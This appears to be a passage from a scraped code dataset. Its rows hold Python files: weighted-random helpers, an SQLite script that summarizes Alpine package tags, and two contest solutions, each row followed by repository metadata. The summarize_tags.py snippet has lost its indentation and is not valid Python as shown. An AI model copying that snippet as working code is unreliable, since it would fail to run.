        raise TypeError("Parameter 'default_weight' is not of type <int>")
    if default_weight < 1:
        raise ValueError("Parameter 'default_weight' must be at least 1")

    result = []
    for entry in data:
        if type(entry) != tuple:
            # Bare item: attach the default weight.
            result.append((default_weight, entry))
            continue
        candidate_weight = entry[0]
        if type(candidate_weight) != int:
            # Tuple whose head is not an int: treat the whole tuple as the item.
            result.append((default_weight, entry))
            continue
        payload = entry[1:]
        if len(payload) == 1:
            payload = payload[0]
        result.append((candidate_weight, payload))
    return result
def weighted_random(pairs, default_weight=1):
    """Pick a random item from a list of (weight, item) pairs.

    Each pair's chance of selection is proportional to its weight.

    Bug fixed: the original tested ``type(pairs)`` (the whole list) and added
    ``pairs[0]`` instead of ``type(pair)`` / ``pair[0]``, so every entry
    contributed ``default_weight`` to the total and the draw was biased.
    """
    total = 0
    for pair in pairs:
        if type(pair) == tuple:
            total += pair[0]
        else:
            # Bare (unweighted) entry.  NOTE: the selection loop below still
            # expects 2-tuples, so run bare items through weighted_pairs first.
            total += default_weight
    # Draw in [1, total] and walk the pairs until the draw is used up.
    r = random.randint(1, total)
    for (weight, value) in pairs:
        r -= weight
        if r <= 0:
            return value
29263081361 | import contextlib
import sqlite3
import sys
def query1(conn, sql=None, count=None):
if count:
sql = f"select count(*) from {count}"
cursor = conn.execute(sql)
return cursor.fetchone()[0]
def summarize_tags(dbpath):
# validate package-tags count
print("SUMMARY")
with contextlib.closing(sqlite3.connect(dbpath)) as conn:
package_tags_count = query1(conn, count="package_tags")
package_count = query1(
conn,
sql="""
select count(distinct(package)) from package_tags
""",
)
distro_count = query1(conn, count="alpine")
d_github_count = query1(
conn,
sql="""
select count(*) from alpine where
source like '%github.com/%'
""",
)
print("alpine distro:")
print(f" - {distro_count} packages")
print(f" - {d_github_count} in GitHub")
print("package_tags:")
print(f" - {package_tags_count} rows")
print(f" - {package_count} packages")
def main(dbpath):
    """Entry point: summarize the SQLite database at *dbpath*."""
    summarize_tags(dbpath)
if __name__ == "__main__":
    # Usage: python summarize_tags.py <path-to-sqlite-db>
    main(sys.argv[1])
| johntellsall/shotglass | alpine/summarize_tags.py | summarize_tags.py | py | 1,164 | python | en | code | 17 | github-code | 90 |
18483794139 | import sys
from itertools import permutations
read = sys.stdin.read        # bulk-read stdin (competitive-programming boilerplate)
readline = sys.stdin.readline
readlines = sys.stdin.readlines
sys.setrecursionlimit(10 ** 9)
INF = 1 << 60                # effectively-infinite sentinel (unused in this file)
MOD = 1000000007             # common contest modulus (unused in this file)
def main():
    # Reads N then N integers from stdin and prints a single maximum value.
    # The construction assigns each sorted element an alternating +/-1
    # coefficient pattern (two mirror variants), sorts the coefficients, and
    # takes the better pairing — presumably maximizing a sum of adjacent
    # differences in some arrangement (contest problem statement not in view).
    N, *A = map(int, read().split())
    A.sort()
    coef_a = [0] * N
    coef_b = [0] * N
    for i in range(N - 1):
        if i % 2 == 0:
            coef_a[i] += 1
            coef_a[i + 1] -= 1
            coef_b[i] -= 1
            coef_b[i + 1] += 1
        else:
            coef_a[i] -= 1
            coef_a[i + 1] += 1
            coef_b[i] += 1
            coef_b[i + 1] -= 1
    coef_a.sort()
    coef_b.sort()
    best_a = sum(a * c for a, c in zip(A, coef_a))
    best_b = sum(a * c for a, c in zip(A, coef_b))
    print(max(best_a, best_b))


if __name__ == '__main__':
    main()
| Aasthaengg/IBMdataset | Python_codes/p03229/s877620283.py | s877620283.py | py | 796 | python | en | code | 0 | github-code | 90 |
18104087189 | import sys
readline = sys.stdin.readline  # faster per-line reads than input()
# Build the set of all odd primes below 10000 (plus 2) by trial division
# against the primes found so far.
prime = set([2])
for i in range(3, 10000, 2):
    for j in prime:
        if i % j == 0:
            break
    else:
        prime.add(i)
n = int(input())
cnt = 0
# Count how many of the n input values are prime: values in the precomputed
# set hit the fast path; larger values are trial-divided by every prime below
# 10000.  That is sufficient only for inputs up to ~10^8 (a composite would
# need a factor <= its square root) and values >= 2 — assumes the problem
# guarantees those bounds; TODO confirm.
for i in (int(readline()) for _ in range(n)):
    if i in prime:
        cnt += 1
        continue
    for j in prime:
        if i % j == 0:
            break
    else:
        cnt += 1
print(cnt)
| Aasthaengg/IBMdataset | Python_codes/p02257/s385010368.py | s385010368.py | py | 403 | python | en | code | 0 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.